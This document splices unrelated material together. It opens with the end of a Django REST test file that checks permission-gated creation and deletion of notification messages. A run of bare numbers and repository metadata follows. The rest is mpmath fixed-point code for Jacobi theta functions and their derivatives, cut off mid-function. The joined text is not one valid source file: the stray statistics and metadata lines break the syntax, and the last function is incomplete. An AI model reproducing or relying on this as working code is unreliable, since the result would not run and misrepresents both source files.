        assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
        assert jdata == expected_result, "unexpected result from API endpoint"

    def test_add_access_with_permission(self):
        """A user holding add_notificationmessage may POST a new message."""
        test_user = "user"
        expected_result = {
            "id": 1,
            "title": "FooBar",
            "type": "INFO",
            "summary_message": "summary message",
            "detailed_message": "detailed message",
            "created": None
        }
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="add_notificationmessage")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("config.add_notificationmessage")

        client = APIClient()
        client.login(username=test_user, password=test_user)

        # create with name
        response = client.post(REST_NOTIFICATIONMESSAGES_LIST, data={
            "title": expected_result["title"],
            "summary_message": expected_result["summary_message"],
            "detailed_message": expected_result["detailed_message"]
        })

        assert response.status_code == status.HTTP_201_CREATED, response.content.decode()

        # adjust ID values from Database
        nm_obj = NotificationMessage.objects.get(title=expected_result["title"])
        expected_result["id"] = nm_obj.id
        expected_result["created"] = nm_obj.created.isoformat().replace("+00:00", "Z")

        assert response.json() == expected_result, "Should provide the new notification message"

    def test_delete_access_with_permission(self):
        """A user holding delete_notificationmessage may DELETE a message."""
        nm = mixer.blend("config.NotificationMessage")
        assert NotificationMessage.objects.count() == 1

        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        perm = Permission.objects.get(codename="delete_notificationmessage")
        assert perm is not None
        u.user_permissions.add(perm)
        u.save()
        assert u.has_perm("config.delete_notificationmessage")

        client = APIClient()
        client.login(username=test_user, password=test_user)
        response = client.delete(REST_NOTIFICATIONMESSAGES_DETAIL % nm.id)

        assert response.status_code == status.HTTP_204_NO_CONTENT
        assert NotificationMessage.objects.count() == 0
| 41.44815
| 137
| 0.575357
| 10,807
| 101,921
| 5.19913
| 0.035903
| 0.054319
| 0.038763
| 0.03887
| 0.887038
| 0.867585
| 0.847741
| 0.839162
| 0.823287
| 0.802054
| 0
| 0.012744
| 0.309426
| 101,921
| 2,458
| 138
| 41.465012
| 0.785548
| 0.031485
| 0
| 0.733887
| 0
| 0
| 0.254561
| 0.058031
| 0
| 0
| 0
| 0
| 0.157227
| 1
| 0.032227
| false
| 0.012207
| 0.015137
| 0
| 0.053711
| 0.000488
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b3d8323a163a43186b85417a1b40f3b656c30d0
| 37,320
|
py
|
Python
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 625
|
2015-01-07T04:56:25.000Z
|
2022-03-28T16:30:27.000Z
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 322
|
2015-01-01T15:19:37.000Z
|
2022-03-27T05:07:51.000Z
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 160
|
2015-01-25T01:16:52.000Z
|
2022-03-21T14:44:20.000Z
|
from .functions import defun, defun_wrapped
@defun
def _jacobi_theta2(ctx, z, q):
    """Jacobi theta function theta_2(z, q) via fixed-point integer
    arithmetic at a working precision wp slightly above ctx.prec.

    Four cases are handled separately depending on whether z and/or q
    have a nonzero imaginary part; complex quantities are carried as
    separate real/imaginary fixed-point integers (suffixes re/im).
    """
    extra1 = 10   # guard bits for the z == 0 / all-real cases
    extra2 = 20   # guard bits for the cases involving complex z or q
    # the loops below break when the fixed precision quantities
    # a and b go to zero;
    # right shifting small negative numbers by wp one obtains -1, not zero,
    # so the condition a**2 + b**2 > MIN is used to break the loops.
    MIN = 2
    if z == ctx.zero:
        if (not ctx._im(q)):
            # z = 0, q real
            wp = ctx.prec + extra1
            x = ctx.to_fixed(ctx._re(q), wp)
            x2 = (x*x) >> wp
            a = b = x2
            s = x2
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                s += a
            s = (1 << (wp+1)) + (s << 1)
            s = ctx.ldexp(s, -wp)
        else:
            # z = 0, q complex
            wp = ctx.prec + extra1
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp-1)
            are = bre = x2re
            aim = bim = x2im
            sre = (1<<wp) + are
            sim = aim
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                sre += are
                sim += aim
            sre = (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
    else:
        if (not ctx._im(q)) and (not ctx._im(z)):
            # z real, q real; cn/sn track cos((2k+1)z)/sin((2k+1)z)
            # via the angle-addition recurrence with c2 = cos(2z), s2 = sin(2z)
            wp = ctx.prec + extra1
            x = ctx.to_fixed(ctx._re(q), wp)
            x2 = (x*x) >> wp
            a = b = x2
            c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
            cn = c1 = ctx.to_fixed(c1, wp)
            sn = s1 = ctx.to_fixed(s1, wp)
            c2 = (c1*c1 - s1*s1) >> wp
            s2 = (c1 * s1) >> (wp - 1)
            cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
            s = c1 + ((a * cn) >> wp)
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
                s += (a * cn) >> wp
            s = (s << 1)
            s = ctx.ldexp(s, -wp)
            s *= ctx.nthroot(q, 4)
            return s
        # case z real, q complex
        elif not ctx._im(z):
            wp = ctx.prec + extra2
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp - 1)
            are = bre = x2re
            aim = bim = x2im
            c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
            cn = c1 = ctx.to_fixed(c1, wp)
            sn = s1 = ctx.to_fixed(s1, wp)
            c2 = (c1*c1 - s1*s1) >> wp
            s2 = (c1 * s1) >> (wp - 1)
            cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
            sre = c1 + ((are * cn) >> wp)
            sim = ((aim * cn) >> wp)
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
                sre += ((are * cn) >> wp)
                sim += ((aim * cn) >> wp)
            sre = (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
        #case z complex, q real
        elif not ctx._im(q):
            wp = ctx.prec + extra2
            x = ctx.to_fixed(ctx._re(q), wp)
            x2 = (x*x) >> wp
            a = b = x2
            # temporarily raise the working precision for the complex cos/sin
            prec0 = ctx.prec
            ctx.prec = wp
            c1, s1 = ctx.cos_sin(z)
            ctx.prec = prec0
            cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
            cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
            snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
            snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
            #c2 = (c1*c1 - s1*s1) >> wp
            c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
            c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
            #s2 = (c1 * s1) >> (wp - 1)
            s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
            s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
            #cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
            t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
            t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
            t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
            t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            sre = c1re + ((a * cnre) >> wp)
            sim = c1im + ((a * cnim) >> wp)
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
                t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
                t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
                t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
                cnre = t1
                cnim = t2
                snre = t3
                snim = t4
                sre += ((a * cnre) >> wp)
                sim += ((a * cnim) >> wp)
            sre = (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
        # case z and q complex
        else:
            wp = ctx.prec + extra2
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp - 1)
            are = bre = x2re
            aim = bim = x2im
            prec0 = ctx.prec
            ctx.prec = wp
            # cos(z), sin(z) with z complex
            c1, s1 = ctx.cos_sin(z)
            ctx.prec = prec0
            cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
            cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
            snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
            snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
            c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
            c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
            s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
            s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
            t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
            t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
            t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
            t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            # NOTE(review): n, termre and termim below are assigned but never
            # read (the first sre/sim assignment is also immediately
            # overwritten by an identical one) — looks like leftover
            # debugging/bookkeeping code; candidates for removal.
            n = 1
            termre = c1re
            termim = c1im
            sre = c1re + ((are * cnre - aim * cnim) >> wp)
            sim = c1im + ((are * cnim + aim * cnre) >> wp)
            n = 3
            termre = ((are * cnre - aim * cnim) >> wp)
            termim = ((are * cnim + aim * cnre) >> wp)
            sre = c1re + ((are * cnre - aim * cnim) >> wp)
            sim = c1im + ((are * cnim + aim * cnre) >> wp)
            n = 5
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                #cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
                t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
                t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
                t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
                t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
                cnre = t1
                cnim = t2
                snre = t3
                snim = t4
                termre = ((are * cnre - aim * cnim) >> wp)
                termim = ((aim * cnre + are * cnim) >> wp)
                sre += ((are * cnre - aim * cnim) >> wp)
                sim += ((aim * cnre + are * cnim) >> wp)
                n += 2
            sre = (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
    # overall prefactor q**(1/4)
    s *= ctx.nthroot(q, 4)
    return s
@defun
def _djacobi_theta2(ctx, z, q, nd):
    """nd-th derivative of theta_2 with respect to z, in fixed point.

    Same four-case structure as _jacobi_theta2; each term of the theta
    series picks up a factor (2k+1)**nd, and the parity of nd decides
    whether the cos factors become sin factors.
    """
    MIN = 2       # loop-termination threshold (see note in _jacobi_theta2)
    extra1 = 10   # guard bits for the all-real case
    extra2 = 20   # guard bits for the cases involving complex z or q
    if (not ctx._im(q)) and (not ctx._im(z)):
        # z real, q real
        wp = ctx.prec + extra1
        x = ctx.to_fixed(ctx._re(q), wp)
        x2 = (x*x) >> wp
        a = b = x2
        c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
        cn = c1 = ctx.to_fixed(c1, wp)
        sn = s1 = ctx.to_fixed(s1, wp)
        c2 = (c1*c1 - s1*s1) >> wp
        s2 = (c1 * s1) >> (wp - 1)
        cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
        if (nd&1):
            # odd derivative order: sin factors
            s = s1 + ((a * sn * 3**nd) >> wp)
        else:
            s = c1 + ((a * cn * 3**nd) >> wp)
        n = 2
        while abs(a) > MIN:
            b = (b*x2) >> wp
            a = (a*b) >> wp
            cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
            if nd&1:
                s += (a * sn * (2*n+1)**nd) >> wp
            else:
                s += (a * cn * (2*n+1)**nd) >> wp
            n += 1
        s = -(s << 1)
        s = ctx.ldexp(s, -wp)
    # case z real, q complex
    elif not ctx._im(z):
        wp = ctx.prec + extra2
        xre = ctx.to_fixed(ctx._re(q), wp)
        xim = ctx.to_fixed(ctx._im(q), wp)
        x2re = (xre*xre - xim*xim) >> wp
        x2im = (xre*xim) >> (wp - 1)
        are = bre = x2re
        aim = bim = x2im
        c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
        cn = c1 = ctx.to_fixed(c1, wp)
        sn = s1 = ctx.to_fixed(s1, wp)
        c2 = (c1*c1 - s1*s1) >> wp
        s2 = (c1 * s1) >> (wp - 1)
        cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
        if (nd&1):
            sre = s1 + ((are * sn * 3**nd) >> wp)
            sim = ((aim * sn * 3**nd) >> wp)
        else:
            sre = c1 + ((are * cn * 3**nd) >> wp)
            sim = ((aim * cn * 3**nd) >> wp)
        n = 5
        while are**2 + aim**2 > MIN:
            bre, bim = (bre * x2re - bim * x2im) >> wp, \
                       (bre * x2im + bim * x2re) >> wp
            are, aim = (are * bre - aim * bim) >> wp, \
                       (are * bim + aim * bre) >> wp
            cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
            if (nd&1):
                sre += ((are * sn * n**nd) >> wp)
                sim += ((aim * sn * n**nd) >> wp)
            else:
                sre += ((are * cn * n**nd) >> wp)
                sim += ((aim * cn * n**nd) >> wp)
            n += 2
        sre = -(sre << 1)
        sim = -(sim << 1)
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    #case z complex, q real
    elif not ctx._im(q):
        wp = ctx.prec + extra2
        x = ctx.to_fixed(ctx._re(q), wp)
        x2 = (x*x) >> wp
        a = b = x2
        # temporarily raise the working precision for the complex cos/sin
        prec0 = ctx.prec
        ctx.prec = wp
        c1, s1 = ctx.cos_sin(z)
        ctx.prec = prec0
        cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
        cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
        snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
        snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
        #c2 = (c1*c1 - s1*s1) >> wp
        c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
        c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
        #s2 = (c1 * s1) >> (wp - 1)
        s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
        s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
        #cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
        t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
        t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
        t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
        t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
        cnre = t1
        cnim = t2
        snre = t3
        snim = t4
        if (nd&1):
            sre = s1re + ((a * snre * 3**nd) >> wp)
            sim = s1im + ((a * snim * 3**nd) >> wp)
        else:
            sre = c1re + ((a * cnre * 3**nd) >> wp)
            sim = c1im + ((a * cnim * 3**nd) >> wp)
        n = 5
        while abs(a) > MIN:
            b = (b*x2) >> wp
            a = (a*b) >> wp
            t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
            t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
            t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
            t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            if (nd&1):
                sre += ((a * snre * n**nd) >> wp)
                sim += ((a * snim * n**nd) >> wp)
            else:
                sre += ((a * cnre * n**nd) >> wp)
                sim += ((a * cnim * n**nd) >> wp)
            n += 2
        sre = -(sre << 1)
        sim = -(sim << 1)
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    # case z and q complex
    else:
        wp = ctx.prec + extra2
        xre = ctx.to_fixed(ctx._re(q), wp)
        xim = ctx.to_fixed(ctx._im(q), wp)
        x2re = (xre*xre - xim*xim) >> wp
        x2im = (xre*xim) >> (wp - 1)
        are = bre = x2re
        aim = bim = x2im
        prec0 = ctx.prec
        ctx.prec = wp
        # cos(2*z), sin(2*z) with z complex
        c1, s1 = ctx.cos_sin(z)
        ctx.prec = prec0
        cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
        cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
        snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
        snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
        c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
        c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
        s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
        s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
        t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
        t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
        t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
        t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
        cnre = t1
        cnim = t2
        snre = t3
        snim = t4
        if (nd&1):
            sre = s1re + (((are * snre - aim * snim) * 3**nd) >> wp)
            sim = s1im + (((are * snim + aim * snre)* 3**nd) >> wp)
        else:
            sre = c1re + (((are * cnre - aim * cnim) * 3**nd) >> wp)
            sim = c1im + (((are * cnim + aim * cnre)* 3**nd) >> wp)
        n = 5
        while are**2 + aim**2 > MIN:
            bre, bim = (bre * x2re - bim * x2im) >> wp, \
                       (bre * x2im + bim * x2re) >> wp
            are, aim = (are * bre - aim * bim) >> wp, \
                       (are * bim + aim * bre) >> wp
            #cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
            t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
            t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
            t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
            t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
            cnre = t1
            cnim = t2
            snre = t3
            snim = t4
            if (nd&1):
                sre += (((are * snre - aim * snim) * n**nd) >> wp)
                sim += (((aim * snre + are * snim) * n**nd) >> wp)
            else:
                sre += (((are * cnre - aim * cnim) * n**nd) >> wp)
                sim += (((aim * cnre + are * cnim) * n**nd) >> wp)
            n += 2
        sre = -(sre << 1)
        sim = -(sim << 1)
        sre = ctx.ldexp(sre, -wp)
        sim = ctx.ldexp(sim, -wp)
        s = ctx.mpc(sre, sim)
    # q**(1/4) prefactor, then the sign fixed by the derivative order
    s *= ctx.nthroot(q, 4)
    if (nd&1):
        return (-1)**(nd//2) * s
    else:
        return (-1)**(1 + nd//2) * s
@defun
def _jacobi_theta3(ctx, z, q):
    """Jacobi theta function theta_3(z, q) via fixed-point integer
    arithmetic; same four-case structure as _jacobi_theta2, but the
    series is over q**(n*n)*cos(2*n*z) and there is no q**(1/4)
    prefactor.
    """
    extra1 = 10   # guard bits for the z == 0 / all-real cases
    extra2 = 20   # guard bits for the cases involving complex z or q
    MIN = 2       # loop-termination threshold (see note in _jacobi_theta2)
    if z == ctx.zero:
        if not ctx._im(q):
            # z = 0, q real
            wp = ctx.prec + extra1
            x = ctx.to_fixed(ctx._re(q), wp)
            s = x
            a = b = x
            x2 = (x*x) >> wp
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                s += a
            s = (1 << wp) + (s << 1)
            s = ctx.ldexp(s, -wp)
            return s
        else:
            # z = 0, q complex
            wp = ctx.prec + extra1
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp - 1)
            sre = are = bre = xre
            sim = aim = bim = xim
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                sre += are
                sim += aim
            sre = (1 << wp) + (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
            return s
    else:
        if (not ctx._im(q)) and (not ctx._im(z)):
            # z real, q real; cn/sn track cos(2nz)/sin(2nz) via the
            # angle-addition recurrence with c1 = cos(2z), s1 = sin(2z)
            s = 0
            wp = ctx.prec + extra1
            x = ctx.to_fixed(ctx._re(q), wp)
            a = b = x
            x2 = (x*x) >> wp
            c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
            c1 = ctx.to_fixed(c1, wp)
            s1 = ctx.to_fixed(s1, wp)
            cn = c1
            sn = s1
            s += (a * cn) >> wp
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
                s += (a * cn) >> wp
            s = (1 << wp) + (s << 1)
            s = ctx.ldexp(s, -wp)
            return s
        # case z real, q complex
        elif not ctx._im(z):
            wp = ctx.prec + extra2
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp - 1)
            are = bre = xre
            aim = bim = xim
            c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
            c1 = ctx.to_fixed(c1, wp)
            s1 = ctx.to_fixed(s1, wp)
            cn = c1
            sn = s1
            sre = (are * cn) >> wp
            sim = (aim * cn) >> wp
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
                sre += (are * cn) >> wp
                sim += (aim * cn) >> wp
            sre = (1 << wp) + (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
            return s
        #case z complex, q real
        elif not ctx._im(q):
            wp = ctx.prec + extra2
            x = ctx.to_fixed(ctx._re(q), wp)
            a = b = x
            x2 = (x*x) >> wp
            # temporarily raise the working precision for the complex cos/sin
            prec0 = ctx.prec
            ctx.prec = wp
            c1, s1 = ctx.cos_sin(2*z)
            ctx.prec = prec0
            cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
            cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
            snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
            snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
            sre = (a * cnre) >> wp
            sim = (a * cnim) >> wp
            while abs(a) > MIN:
                b = (b*x2) >> wp
                a = (a*b) >> wp
                t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
                t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
                t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
                t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
                cnre = t1
                cnim = t2
                snre = t3
                snim = t4
                sre += (a * cnre) >> wp
                sim += (a * cnim) >> wp
            sre = (1 << wp) + (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
            return s
        # case z and q complex
        else:
            wp = ctx.prec + extra2
            xre = ctx.to_fixed(ctx._re(q), wp)
            xim = ctx.to_fixed(ctx._im(q), wp)
            x2re = (xre*xre - xim*xim) >> wp
            x2im = (xre*xim) >> (wp - 1)
            are = bre = xre
            aim = bim = xim
            prec0 = ctx.prec
            ctx.prec = wp
            # cos(2*z), sin(2*z) with z complex
            c1, s1 = ctx.cos_sin(2*z)
            ctx.prec = prec0
            cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
            cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
            snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
            snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
            sre = (are * cnre - aim * cnim) >> wp
            sim = (aim * cnre + are * cnim) >> wp
            while are**2 + aim**2 > MIN:
                bre, bim = (bre * x2re - bim * x2im) >> wp, \
                           (bre * x2im + bim * x2re) >> wp
                are, aim = (are * bre - aim * bim) >> wp, \
                           (are * bim + aim * bre) >> wp
                t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
                t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
                t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
                t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
                cnre = t1
                cnim = t2
                snre = t3
                snim = t4
                sre += (are * cnre - aim * cnim) >> wp
                sim += (aim * cnre + are * cnim) >> wp
            sre = (1 << wp) + (sre << 1)
            sim = (sim << 1)
            sre = ctx.ldexp(sre, -wp)
            sim = ctx.ldexp(sim, -wp)
            s = ctx.mpc(sre, sim)
            return s
@defun
def _djacobi_theta3(ctx, z, q, nd):
    """nd=1,2,3 order of the derivative with respect to z

    Fixed-point evaluation with the same four-case structure as
    _jacobi_theta3; each series term picks up a factor n**nd, and the
    parity of nd decides whether the cos factors become sin factors.
    """
    MIN = 2       # loop-termination threshold (see note in _jacobi_theta2)
    extra1 = 10   # guard bits for the all-real case
    extra2 = 20   # guard bits for the cases involving complex z or q
    if (not ctx._im(q)) and (not ctx._im(z)):
        # z real, q real
        s = 0
        wp = ctx.prec + extra1
        x = ctx.to_fixed(ctx._re(q), wp)
        a = b = x
        x2 = (x*x) >> wp
        c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
        c1 = ctx.to_fixed(c1, wp)
        s1 = ctx.to_fixed(s1, wp)
        cn = c1
        sn = s1
        if (nd&1):
            # odd derivative order: sin factors
            s += (a * sn) >> wp
        else:
            s += (a * cn) >> wp
        n = 2
        while abs(a) > MIN:
            b = (b*x2) >> wp
            a = (a*b) >> wp
            cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
            if nd&1:
                s += (a * sn * n**nd) >> wp
            else:
                s += (a * cn * n**nd) >> wp
            n += 1
        s = -(s << (nd+1))
        s = ctx.ldexp(s, -wp)
    # case z real, q complex
    elif not ctx._im(z):
        wp = ctx.prec + extra2
        xre = ctx.to_fixed(ctx._re(q), wp)
        xim = ctx.to_fixed(ctx._im(q), wp)
        x2re = (xre*xre - xim*xim) >> wp
        x2im = (xre*xim) >> (wp - 1)
        are = bre = xre
        aim = bim = xim
        c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
        c1 = ctx.to_fixed(c1, wp)
        s1 = ctx.to_fixed(s1, wp)
        cn = c1
        sn = s1
        if (nd&1):
            sre = (are * sn) >> wp
            sim = (aim * sn) >> wp
        else:
            sre = (are * cn) >> wp
            sim = (aim * cn) >> wp
        n = 2
